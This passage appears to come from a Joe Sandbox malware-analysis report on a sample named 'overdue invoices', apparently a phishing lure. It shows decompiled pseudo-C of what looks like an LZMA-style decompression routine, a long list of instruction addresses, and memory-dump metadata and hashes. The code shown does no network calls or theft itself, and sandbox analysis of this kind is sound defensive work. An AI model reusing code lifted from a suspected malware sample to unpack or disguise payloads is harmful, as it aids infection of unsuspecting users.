											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                  0x00406481
                  0x00406481
                  0x00406481
                  0x00406481
                  0x00406487
                  0x0040648b
                  0x0040648f
                  0x00406499
                  0x004064a7
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00000000
                  0x00000000
                  0x004067ba
                  0x004067c3
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x00406811
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406813
                  0x00406813
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x004068c8
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406796
                  0x0040679c
                  0x004067a3
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x00000000
                  0x004067ae
                  0x00406818
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00405edf
                  0x00000000
                  0x00405ee6
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef0
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4b
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f95
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fbf
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x00406005
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406713
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406688
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x0040678a
                  0x00406745
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00000000
                  0x0040646a
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x0040678a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004064af
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x00406548
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067b4
                  0x0040677d

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                  • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                  • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
